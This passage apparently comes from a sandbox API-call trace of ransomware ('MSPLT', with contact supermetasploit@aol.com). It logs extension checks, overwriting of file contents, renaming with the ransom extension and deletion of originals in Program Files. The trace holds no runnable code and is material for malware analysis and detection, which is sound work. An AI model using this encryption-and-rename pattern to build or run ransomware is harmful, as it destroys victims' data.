lpString2=".tlb") returned -1 [0297.359] lstrlenW (lpString=".xls") returned 4 [0297.359] lstrcmpiW (lpString1=".xls", lpString2=".tlb") returned 1 [0297.359] lstrlenW (lpString=".xlsx") returned 5 [0297.359] lstrcmpiW (lpString1=".xlsx", lpString2="0.tlb") returned -1 [0297.359] lstrlenW (lpString=".ppt") returned 4 [0297.359] lstrcmpiW (lpString1=".ppt", lpString2=".tlb") returned -1 [0297.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0297.359] lstrlenW (lpString=".zip") returned 4 [0297.359] lstrcmpiW (lpString1=".zip", lpString2=".tlb") returned 1 [0297.359] lstrlenW (lpString=".rar") returned 4 [0297.359] lstrcmpiW (lpString1=".rar", lpString2=".tlb") returned -1 [0297.359] lstrlenW (lpString=".bz2") returned 4 [0297.359] lstrcmpiW (lpString1=".bz2", lpString2=".tlb") returned -1 [0297.359] lstrlenW (lpString=".7z") returned 3 [0297.359] lstrcmpiW (lpString1=".7z", lpString2="tlb") returned -1 [0297.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0297.359] lstrlenW (lpString=".dbf") returned 4 [0297.359] lstrcmpiW (lpString1=".dbf", lpString2=".tlb") returned -1 [0297.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0297.359] lstrlenW (lpString=".1cd") returned 4 [0297.359] lstrcmpiW (lpString1=".1cd", lpString2=".tlb") returned -1 [0297.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0297.359] lstrlenW (lpString=".jpg") returned 4 [0297.360] lstrcmpiW (lpString1=".jpg", lpString2=".tlb") returned -1 [0297.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0297.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0297.360] lstrlenW (lpString=".doc") returned 4 [0297.360] lstrcmpiW (lpString1=".doc", lpString2=".tlb") returned -1 [0297.360] lstrlenW (lpString=".docx") returned 5 [0297.360] lstrcmpiW (lpString1=".docx", lpString2="0.tlb") returned -1 [0297.360] lstrlenW (lpString=".pdf") returned 4 [0297.360] lstrcmpiW (lpString1=".pdf", lpString2=".tlb") returned -1 [0297.360] lstrlenW (lpString=".xls") returned 4 [0297.360] lstrcmpiW (lpString1=".xls", lpString2=".tlb") returned 1 [0297.360] lstrlenW (lpString=".xlsx") returned 5 [0297.360] lstrcmpiW (lpString1=".xlsx", lpString2="0.tlb") returned -1 [0297.360] lstrlenW (lpString=".ppt") returned 4 [0297.360] lstrcmpiW (lpString1=".ppt", lpString2=".tlb") returned -1 [0297.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0297.360] lstrlenW (lpString=".zip") returned 4 [0297.360] lstrcmpiW (lpString1=".zip", lpString2=".tlb") returned 1 [0297.360] lstrlenW (lpString=".rar") returned 4 [0297.360] lstrcmpiW (lpString1=".rar", lpString2=".tlb") returned -1 [0297.360] lstrlenW (lpString=".bz2") returned 4 [0297.360] lstrcmpiW (lpString1=".bz2", lpString2=".tlb") returned -1 [0297.360] lstrlenW (lpString=".7z") returned 3 [0297.360] lstrcmpiW (lpString1=".7z", lpString2="tlb") returned -1 [0297.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0297.360] lstrlenW (lpString=".dbf") returned 4 [0297.360] lstrcmpiW (lpString1=".dbf", lpString2=".tlb") returned -1 [0297.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0297.360] lstrlenW (lpString=".1cd") returned 4 [0297.361] lstrcmpiW (lpString1=".1cd", lpString2=".tlb") returned -1 [0297.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0297.361] lstrlenW (lpString=".jpg") returned 4 [0297.361] lstrcmpiW (lpString1=".jpg", lpString2=".tlb") returned -1 [0297.361] lstrcmpiW (lpString1=".tlb", lpString2=".MSPLT") returned 1 [0297.361] lstrlenW (lpString="msado21.tlb") returned 11 [0297.361] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0297.363] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=53760) returned 1 [0297.363] CloseHandle (hObject=0x3d0) returned 1 [0297.364] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb")) returned 0x20 [0297.364] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.364] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0297.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0297.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0297.364] lstrlenW (lpString=".doc") returned 4 [0297.364] lstrcmpiW (lpString1=".doc", lpString2=".tlb") returned -1 [0297.364] lstrlenW (lpString=".docx") returned 5 [0297.364] lstrcmpiW (lpString1=".docx", lpString2="1.tlb") returned -1 [0297.364] lstrlenW (lpString=".pdf") returned 4 [0297.364] lstrcmpiW (lpString1=".pdf", lpString2=".tlb") returned -1 [0297.364] lstrlenW (lpString=".xls") returned 4 [0297.364] lstrcmpiW (lpString1=".xls", lpString2=".tlb") returned 1 [0297.364] lstrlenW (lpString=".xlsx") returned 5 [0297.364] lstrcmpiW (lpString1=".xlsx", lpString2="1.tlb") returned -1 [0297.364] lstrlenW (lpString=".ppt") returned 4 [0297.364] lstrcmpiW (lpString1=".ppt", lpString2=".tlb") returned -1 [0297.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0297.365] lstrlenW (lpString=".zip") returned 4 [0297.365] lstrcmpiW (lpString1=".zip", lpString2=".tlb") returned 1 [0297.365] lstrlenW (lpString=".rar") returned 4 [0297.365] lstrcmpiW (lpString1=".rar", lpString2=".tlb") returned -1 [0297.365] lstrlenW (lpString=".bz2") returned 4 [0297.365] lstrcmpiW (lpString1=".bz2", lpString2=".tlb") returned -1 [0297.365] lstrlenW (lpString=".7z") returned 3 [0297.365] lstrcmpiW (lpString1=".7z", lpString2="tlb") returned -1 [0297.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0297.365] lstrlenW (lpString=".dbf") returned 4 [0297.365] lstrcmpiW (lpString1=".dbf", lpString2=".tlb") returned -1 [0297.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0297.365] lstrlenW (lpString=".1cd") returned 4 [0297.365] lstrcmpiW (lpString1=".1cd", lpString2=".tlb") returned -1 [0297.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0297.365] lstrlenW (lpString=".jpg") returned 4 [0297.365] lstrcmpiW (lpString1=".jpg", lpString2=".tlb") returned -1 [0297.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0297.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0297.365] lstrlenW (lpString=".doc") returned 4 [0297.365] lstrcmpiW (lpString1=".doc", lpString2=".tlb") returned -1 [0297.365] lstrlenW (lpString=".docx") returned 5 [0297.365] lstrcmpiW (lpString1=".docx", lpString2="1.tlb") returned -1 [0297.366] lstrlenW (lpString=".pdf") returned 4 [0297.366] lstrcmpiW (lpString1=".pdf", lpString2=".tlb") returned -1 [0297.366] lstrlenW (lpString=".xls") returned 4 [0297.366] lstrcmpiW (lpString1=".xls", lpString2=".tlb") returned 1 [0297.366] lstrlenW (lpString=".xlsx") returned 5 [0297.366] lstrcmpiW (lpString1=".xlsx", lpString2="1.tlb") returned -1 [0297.366] lstrlenW (lpString=".ppt") returned 4 [0297.366] lstrcmpiW (lpString1=".ppt", lpString2=".tlb") returned -1 [0297.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0297.366] lstrlenW (lpString=".zip") returned 4 [0297.366] lstrcmpiW (lpString1=".zip", lpString2=".tlb") returned 1 [0297.366] lstrlenW (lpString=".rar") returned 4 [0297.366] lstrcmpiW (lpString1=".rar", lpString2=".tlb") returned -1 [0297.366] lstrlenW (lpString=".bz2") returned 4 [0297.366] lstrcmpiW (lpString1=".bz2", lpString2=".tlb") returned -1 [0297.366] lstrlenW (lpString=".7z") returned 3 [0297.366] lstrcmpiW (lpString1=".7z", lpString2="tlb") returned -1 [0297.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0297.366] lstrlenW (lpString=".dbf") returned 4 [0297.366] lstrcmpiW (lpString1=".dbf", lpString2=".tlb") returned -1 [0297.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0297.366] lstrlenW (lpString=".1cd") returned 4 [0297.366] lstrcmpiW (lpString1=".1cd", lpString2=".tlb") returned -1 [0297.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0297.366] lstrlenW (lpString=".jpg") returned 4 [0297.366] lstrcmpiW (lpString1=".jpg", lpString2=".tlb") returned -1 [0297.367] lstrcmpiW (lpString1=".tlb", lpString2=".MSPLT") returned 1 [0297.367] lstrlenW (lpString="msado25.tlb") returned 11 [0297.367] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0297.384] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0297.384] CloseHandle (hObject=0x3d0) returned 1 [0297.384] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb")) returned 0x20 [0297.385] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.385] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0297.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned 52 [0297.385] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned 52 [0297.385] lstrlenW (lpString=".doc") returned 4 [0297.385] lstrcmpiW (lpString1=".doc", lpString2=".tlb") returned -1 [0297.385] lstrlenW (lpString=".docx") returned 5 [0297.385] lstrcmpiW (lpString1=".docx", lpString2="5.tlb") returned -1 [0297.385] lstrlenW (lpString=".pdf") returned 4 [0297.385] lstrcmpiW (lpString1=".pdf", lpString2=".tlb") returned -1 [0297.385] lstrlenW (lpString=".xls") returned 4 [0297.385] lstrcmpiW (lpString1=".xls", lpString2=".tlb") returned 1 [0297.385] lstrlenW (lpString=".xlsx") returned 5 [0297.385] lstrcmpiW (lpString1=".xlsx", lpString2="5.tlb") returned -1 [0297.385] lstrlenW (lpString=".ppt") returned 4 [0297.385] lstrcmpiW (lpString1=".ppt", lpString2=".tlb") returned -1 [0297.386] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned 52 [0297.386] lstrlenW (lpString=".zip") returned 4 [0297.386] lstrcmpiW (lpString1=".zip", lpString2=".tlb") returned 1 [0297.386] lstrlenW (lpString=".rar") returned 4 [0297.386] lstrcmpiW (lpString1=".rar", lpString2=".tlb") returned -1 [0297.386] lstrlenW (lpString=".bz2") returned 4 [0297.386] lstrcmpiW (lpString1=".bz2", lpString2=".tlb") returned -1 [0297.386] lstrlenW (lpString=".7z") returned 3 [0297.386] lstrcmpiW (lpString1=".7z", lpString2="tlb") returned -1 [0297.386] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned 52 [0297.386] lstrlenW (lpString=".dbf") returned 4 [0297.386] lstrcmpiW (lpString1=".dbf", lpString2=".tlb") returned -1 [0297.939] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa", dwFileAttributes=0x20) returned 1 [0307.880] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa.id-b4197730.[supermetasploit@aol.com].msplt")) returned 1 [0307.881] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0307.882] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfc64 | out: lpNewFilePointer=0x0) returned 1 [0307.882] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfc24 | out: lpNewFilePointer=0x0) returned 1 [0307.882] ReadFile (in: hFile=0x488, lpBuffer=0x3ec4058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x35dfc30, lpOverlapped=0x0 | out: lpBuffer=0x3ec4058*, lpNumberOfBytesRead=0x35dfc30*=0x40000, lpOverlapped=0x0) returned 1 [0307.884] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x5f0000, lpNewFilePointer=0x0, dwMoveMethod=0x35dfc24 | out: lpNewFilePointer=0x0) returned 1 [0307.884] ReadFile (in: hFile=0x488, lpBuffer=0x3f04058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x35dfc30, lpOverlapped=0x0 | out: lpBuffer=0x3f04058*, lpNumberOfBytesRead=0x35dfc30*=0x40000, lpOverlapped=0x0) returned 1 [0307.890] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x35dfc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0307.890] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x1190000, lpNewFilePointer=0x0, dwMoveMethod=0x35dfc24 | out: lpNewFilePointer=0x0) returned 1 [0307.890] ReadFile (in: hFile=0x488, lpBuffer=0x3f44058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x35dfc30, lpOverlapped=0x0 | out: lpBuffer=0x3f44058*, lpNumberOfBytesRead=0x35dfc30*=0x40000, lpOverlapped=0x0) returned 1 [0308.336] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0308.336] WriteFile (in: hFile=0x488, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x35dfca8, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfca8*=0xc0102, lpOverlapped=0x0) returned 1 [0308.471] SetEndOfFile (hFile=0x488) returned 1 [0308.630] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40000) returned 0x4077ee0 [0308.637] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfc74 | out: lpNewFilePointer=0x0) returned 1 [0308.637] WriteFile (in: hFile=0x488, lpBuffer=0x4077ee0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x35dfc80, lpOverlapped=0x0 | out: lpBuffer=0x4077ee0*, lpNumberOfBytesWritten=0x35dfc80*=0x40000, lpOverlapped=0x0) returned 1 [0308.639] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x5f0000, lpNewFilePointer=0x0, dwMoveMethod=0x35dfc74 | out: lpNewFilePointer=0x0) returned 1 [0308.639] WriteFile (in: hFile=0x488, lpBuffer=0x4077ee0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x35dfc80, lpOverlapped=0x0 | out: lpBuffer=0x4077ee0*, lpNumberOfBytesWritten=0x35dfc80*=0x40000, lpOverlapped=0x0) returned 1 [0308.646] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x1190000, lpNewFilePointer=0x0, dwMoveMethod=0x35dfc74 | out: lpNewFilePointer=0x0) returned 1 [0308.646] WriteFile (in: hFile=0x488, lpBuffer=0x4077ee0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x35dfc80, lpOverlapped=0x0 | out: lpBuffer=0x4077ee0*, lpNumberOfBytesWritten=0x35dfc80*=0x40000, lpOverlapped=0x0) returned 1 [0308.649] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.649] CloseHandle (hObject=0x488) returned 1 [0310.715] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x21) returned 1 [0310.803] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0310.803] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0310.803] lstrlenW (lpString=".doc") returned 4 [0310.803] lstrcmpiW (lpString1=".doc", lpString2=".jsa") returned -1 [0310.803] lstrlenW (lpString=".docx") returned 5 [0310.803] lstrcmpiW (lpString1=".docx", lpString2="s.jsa") returned -1 [0310.803] lstrlenW (lpString=".pdf") returned 4 [0310.803] lstrcmpiW (lpString1=".pdf", lpString2=".jsa") returned 1 [0310.803] lstrlenW (lpString=".xls") returned 4 [0310.803] lstrcmpiW (lpString1=".xls", lpString2=".jsa") returned 1 [0310.803] lstrlenW (lpString=".xlsx") returned 5 [0310.803] lstrcmpiW (lpString1=".xlsx", lpString2="s.jsa") returned -1 [0310.803] lstrlenW (lpString=".ppt") returned 4 [0310.803] lstrcmpiW (lpString1=".ppt", lpString2=".jsa") returned 1 [0310.803] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0310.803] lstrlenW (lpString=".zip") returned 4 [0310.803] lstrcmpiW (lpString1=".zip", lpString2=".jsa") returned 1 [0310.803] lstrlenW (lpString=".rar") returned 4 [0310.803] lstrcmpiW (lpString1=".rar", lpString2=".jsa") returned 1 [0310.803] lstrlenW (lpString=".bz2") returned 4 [0310.803] lstrcmpiW (lpString1=".bz2", lpString2=".jsa") returned -1 [0310.803] lstrlenW (lpString=".7z") returned 3 [0310.804] lstrcmpiW (lpString1=".7z", lpString2="jsa") returned -1 [0310.804] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0310.804] lstrlenW (lpString=".dbf") returned 4 [0310.804] lstrcmpiW (lpString1=".dbf", lpString2=".jsa") returned -1 [0310.804] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0310.804] lstrlenW (lpString=".1cd") returned 4 [0310.804] lstrcmpiW (lpString1=".1cd", lpString2=".jsa") returned -1 [0310.804] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0310.804] lstrlenW (lpString=".jpg") returned 4 [0310.804] lstrcmpiW (lpString1=".jpg", lpString2=".jsa") returned -1 [0310.804] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0310.804] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0310.804] lstrlenW (lpString=".doc") returned 4 [0310.804] lstrcmpiW (lpString1=".doc", lpString2=".jsa") returned -1 [0310.804] lstrlenW (lpString=".docx") returned 5 [0310.804] lstrcmpiW (lpString1=".docx", lpString2="s.jsa") returned -1 [0310.804] lstrlenW (lpString=".pdf") returned 4 [0310.804] lstrcmpiW (lpString1=".pdf", lpString2=".jsa") returned 1 [0310.804] lstrlenW (lpString=".xls") returned 4 [0310.805] lstrcmpiW (lpString1=".xls", lpString2=".jsa") returned 1 [0310.805] lstrlenW (lpString=".xlsx") returned 5 [0310.805] lstrcmpiW (lpString1=".xlsx", lpString2="s.jsa") returned -1 [0310.805] lstrlenW (lpString=".ppt") returned 4 [0310.805] lstrcmpiW (lpString1=".ppt", lpString2=".jsa") returned 1 [0310.805] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0310.805] lstrlenW (lpString=".zip") returned 4 [0310.805] lstrcmpiW (lpString1=".zip", lpString2=".jsa") returned 1 [0310.805] lstrlenW (lpString=".rar") returned 4 [0310.805] lstrcmpiW (lpString1=".rar", lpString2=".jsa") returned 1 [0310.805] lstrlenW (lpString=".bz2") returned 4 [0310.805] lstrcmpiW (lpString1=".bz2", lpString2=".jsa") returned -1 [0310.805] lstrlenW (lpString=".7z") returned 3 [0310.805] lstrcmpiW (lpString1=".7z", lpString2="jsa") returned -1 [0310.805] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0310.805] lstrlenW (lpString=".dbf") returned 4 [0310.805] lstrcmpiW (lpString1=".dbf", lpString2=".jsa") returned -1 [0310.805] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0310.805] lstrlenW (lpString=".1cd") returned 4 [0310.805] lstrcmpiW (lpString1=".1cd", lpString2=".jsa") returned -1 [0310.805] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0310.805] lstrlenW (lpString=".jpg") returned 4 [0310.805] lstrcmpiW (lpString1=".jpg", lpString2=".jsa") returned -1 [0310.806] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0310.806] lstrlenW (lpString="jfxswt.jar") returned 10 [0310.806] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfxswt.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0310.842] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=33932) returned 1 [0310.842] CloseHandle (hObject=0x524) returned 1 [0310.843] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfxswt.jar")) returned 0x20 [0310.860] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfxswt.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0310.860] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfxswt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0310.860] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0310.860] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0310.861] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfxswt.jar.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x538 [0310.862] GetLastError () returned 0x0 [0310.862] ReadFile (in: hFile=0x540, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x848c, lpOverlapped=0x0) returned 1 [0311.893] WriteFile (in: hFile=0x538, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x8490, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x8490, lpOverlapped=0x0) returned 1 [0312.180] ReadFile (in: hFile=0x540, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0312.180] WriteFile (in: hFile=0x538, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0xe8, lpOverlapped=0x0) returned 1 [0312.180] SetEndOfFile (hFile=0x538) returned 1 [0312.677] CloseHandle (hObject=0x538) returned 1 [0312.680] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0312.680] SetEndOfFile (hFile=0x540) returned 1 [0312.779] CloseHandle (hObject=0x540) returned 1 [0312.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0313.633] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfxswt.jar")) returned 1 [0313.995] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar") returned 49 [0313.995] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar") returned 49 [0313.995] lstrlenW (lpString=".doc") returned 4 [0313.995] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0313.995] lstrlenW (lpString=".docx") returned 5 [0313.995] lstrcmpiW (lpString1=".docx", lpString2="t.jar") returned -1 [0313.995] lstrlenW (lpString=".pdf") returned 4 [0313.995] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0313.996] lstrlenW (lpString=".xls") returned 4 [0313.996] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0313.996] lstrlenW (lpString=".xlsx") returned 5 [0313.996] lstrcmpiW (lpString1=".xlsx", lpString2="t.jar") returned -1 [0313.996] lstrlenW (lpString=".ppt") returned 4 [0313.996] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0313.996] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfxswt.jar") returned 49 [0313.996] lstrlenW 